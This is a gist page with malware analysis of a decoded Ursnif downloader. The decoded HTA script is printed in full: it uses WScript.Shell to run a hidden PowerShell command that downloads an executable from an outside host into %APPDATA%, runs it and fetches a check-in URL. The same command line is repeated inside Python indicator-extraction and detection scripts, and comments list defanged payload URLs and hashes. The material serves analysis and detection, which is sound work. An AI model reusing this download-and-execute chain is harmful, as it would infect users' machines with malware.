Created March 2, 2018 12:10 by Blevene (gist a617715d2fe2a1a72fdace3a376dd3dd)
Decoded downloader component from d8ecb55b823b87a06eb8fc524baff969974a092385ac09bdb02537202380375c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
<script>
// Obfuscated aliases: diskomagana is ActiveXObject, termianxala is a WScript.Shell instance
var diskomagana = ActiveXObject;
var termianxala = new diskomagana('WScript.Shell');
// "p o w e r s h e l l" with the spaces stripped, followed by the download-and-execute command line:
// fetch bomberc.class to %APPDATA%\fb1b1d10.exe, start it, then fetch a check-in URL (freddie.php?l=bomberc).
// The trailing .replace(//g,'') is reproduced as rendered; its regex body is empty here.
var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
// Close the HTA window after roughly 16 seconds so nothing stays visible
setTimeout(function(){window.close()},16180);
// Run the PowerShell command line with a hidden window (second argument 0)
setTimeout(function(){termianxala.run(lopomeriara,0)})
</script>
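As an added example (not part of the gist), the script below statically recovers the command line, URLs, contacted hostname and dropped file path from a constructed copy of the decoded downloader, handling the one obfuscation trick the sample uses (a URI-decoded string with its spaces stripped). The function names, the SUSPICIOUS table and the result layout are my own; the hostname and file name are the ones on the page, and the empty `.replace(//g,'')` is kept exactly as rendered.

```python
"""Static indicator extraction for the decoded downloader above.

Added example, not part of the gist. It reads a constructed copy of the
decoded script (embedded below) so it runs offline, and handles the single
obfuscation trick the sample uses: decodeURIComponent("p o w e r s h e l l")
with the spaces stripped by .replace(/ /g,'').
"""
import re
from urllib.parse import unquote, urlparse

# Constructed copy of the decoded downloader as it appears in the gist. The
# final .replace(//g,'') is reproduced as rendered, with its empty regex body.
SAMPLE = r"""<script>
var diskomagana = ActiveXObject;
var termianxala = new diskomagana('WScript.Shell');
var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
setTimeout(function(){window.close()},16180);
setTimeout(function(){termianxala.run(lopomeriara,0)})
</script>"""

# A JS string literal, double- or single-quoted, honouring backslash escapes.
_JS_LITERAL = re.compile(r'"((?:\\.|[^"\\])*)"|\'((?:\\.|[^\'\\])*)\'')
# The decodeURIComponent("p o w e r s h e l l").replace(/ /g,'') idiom.
_SPACED = re.compile(r"\(?decodeURIComponent\(\"([^\"]*)\"\)\)?\.replace\(/ /g,''\)")
_URL = re.compile(r'https?://[^\s\'"\\)]+')
# $env:APPDATA + '\\name.exe' or $env:APPDATA'\\name.exe'  ->  (variable, file)
_ENV_PATH = re.compile(r"\$env:(\w+)[^\w]*?([\w-]+\.exe)", re.IGNORECASE)

# Substrings worth flagging in the recovered command line (my own table).
SUSPICIOUS = {
    "-Exec Bypass": "execution policy bypass",
    "-NoExit": "keeps the PowerShell host alive after the command",
    "DownloadFile(": "fetches a file over HTTP",
    "DownloadString(": "fetches remote content as a string (check-in / next stage)",
    "Start-Process": "launches the dropped file",
}


def unspace_literals(text: str) -> str:
    """Collapse decodeURIComponent("a b c").replace(/ /g,'') into "abc"."""
    return _SPACED.sub(lambda m: '"' + unquote(m.group(1)).replace(" ", "") + '"', text)


def _unescape(s: str) -> str:
    # JS backslash escapes: \' -> ', \\ -> \ (enough for this sample)
    return re.sub(r"\\(.)", r"\1", s)


def concatenated_literals(expr: str) -> str:
    """Join every string literal in an expression, approximating JS '+' concatenation."""
    parts = []
    for m in _JS_LITERAL.finditer(expr):
        parts.append(_unescape(m.group(1) if m.group(1) is not None else m.group(2)))
    return "".join(parts)


def recover_command(script: str) -> str:
    """Return the command line handed to WScript.Shell.run(), or '' if not found."""
    text = unspace_literals(script)
    run = re.search(r"\.run\((\w+)\s*,", text)          # which variable is executed
    if not run:
        return ""
    decl = re.search(r"var\s+" + re.escape(run.group(1)) + r"\s*=(.*)", text)
    return concatenated_literals(decl.group(1)) if decl else ""


def extract_indicators(script: str) -> dict:
    """Recover the command line and pull network and host indicators out of it."""
    cmd = recover_command(script)
    urls = sorted(set(_URL.findall(cmd)))
    hosts = sorted({urlparse(u).hostname for u in urls})
    dropped = sorted({"%" + var.upper() + "%\\" + name for var, name in _ENV_PATH.findall(cmd)})
    hits = [why for needle, why in SUSPICIOUS.items() if needle in cmd]
    if re.search(r"\.run\(\w+\s*,\s*0\)", script):
        hits.append("command run with a hidden window (WScript.Shell.run(..., 0))")
    if "window.close()" in script:
        hits.append("HTA window closed to hide itself")
    return {"command": cmd, "urls": urls, "hosts": hosts,
            "dropped_files": dropped, "indicators": hits}


if __name__ == "__main__":
    for key, value in extract_indicators(SAMPLE).items():
        print(key + ":", value)
```

The literal-joining step is deliberately regex-based rather than a JS evaluation: an analyst usually wants the indicators without executing anything, and the only dynamic piece in this sample (the space-stripped `powershell` string) is handled as a rewrite.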
It appears this pattern of mshta.exe downloading from a URI with utma= in it goes back to December 2017. All Ursnif.
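Added example, not from the gist or its commenters: a small detection pass over constructed process-creation events that scores the mshta.exe -> powershell.exe chain seen in the script above and the `utma=` URI pattern noted in the comment. The event format, the scoring weights, the threshold and the `example.invalid` URLs are assumptions; the PowerShell switches and the `%APPDATA%\fb1b1d10.exe` drop path are taken from the page.

```python
"""Detection logic for the mshta -> PowerShell downloader chain described above.

Added example, not part of the gist. Events are constructed in a simplified
(parent image, image, command line) form, not any vendor's real log schema.
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed process-creation events. example.invalid is a placeholder host.
EVENTS = [
    ("explorer.exe", "mshta.exe",
     "mshta.exe http://example.invalid/index.php?utma=PLACEHOLDER"),
    ("mshta.exe", "powershell.exe",
     "powershell -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient)"
     ".DownloadFile('http://example.invalid/NOB/bomberc.class', $env:APPDATA + '\\\\fb1b1d10.exe');"
     " Start-Process $env:APPDATA'\\\\fb1b1d10.exe'"),
    ("explorer.exe", "powershell.exe",
     "powershell -NoProfile -File C:\\Scripts\\inventory.ps1"),          # benign admin script
    ("explorer.exe", "mshta.exe",
     "mshta.exe C:\\Program Files\\Vendor\\setup.hta"),                   # local HTA, no network
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
EXEC_BYPASS = re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\.Download(?:File|String)\(", re.IGNORECASE)
DROP_RUN_RE = re.compile(r"\$env:APPDATA.*Start-Process", re.IGNORECASE | re.DOTALL)


def score_event(parent: str, image: str, cmdline: str):
    """Return (score, reasons) for one event; weights are my own choice."""
    parent, image = parent.lower(), image.lower()
    score, reasons = 0, []
    if image == "mshta.exe":
        for url in URL_RE.findall(cmdline):
            score += 2
            reasons.append("mshta fetching remote content: " + url)
            if "utma" in parse_qs(urlparse(url).query):
                score += 3
                reasons.append("URI carries a utma= parameter (pattern noted in the thread)")
    if image == "powershell.exe":
        if parent == "mshta.exe":
            score += 4
            reasons.append("PowerShell spawned by mshta.exe")
        if EXEC_BYPASS.search(cmdline):
            score += 1
            reasons.append("execution policy bypass on the command line")
        if DOWNLOAD_RE.search(cmdline):
            score += 2
            reasons.append("WebClient download in the command line")
        if DROP_RUN_RE.search(cmdline):
            score += 2
            reasons.append("writes under %APPDATA% and launches the file")
    return score, reasons


def flagged(events, threshold: int = 4):
    """Events at or above the threshold, as (index, score, reasons)."""
    out = []
    for i, (parent, image, cmdline) in enumerate(events):
        score, reasons = score_event(parent, image, cmdline)
        if score >= threshold:
            out.append((i, score, reasons))
    return out


if __name__ == "__main__":
    for idx, score, reasons in flagged(EVENTS):
        print(idx, score, "; ".join(reasons))
```

The parent/child relationship carries most of the weight on purpose: a remote HTA or an `-Exec Bypass` flag alone shows up in legitimate environments, but PowerShell launched by mshta.exe almost never does, and that is the link the downloader above cannot avoid.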
I managed to find a live payload from:
hXXp://173.44.42[.]156/track/amgb.class
hXXp://173.44.42[.]156/track/amg.class
hXXp://173.44.42[.]156/track/amgc.class
Which was present in 3e9d59dcefb6fa5e17d2d9fb9d50e63b712b9fd852444cd341d0675b6ed70186 from the 26th of February.
The payload, 2c5429d1b834abab3c96da9708e6fb77f52d5b26dc32b6411f3d2c70652210b2, is Ursnif.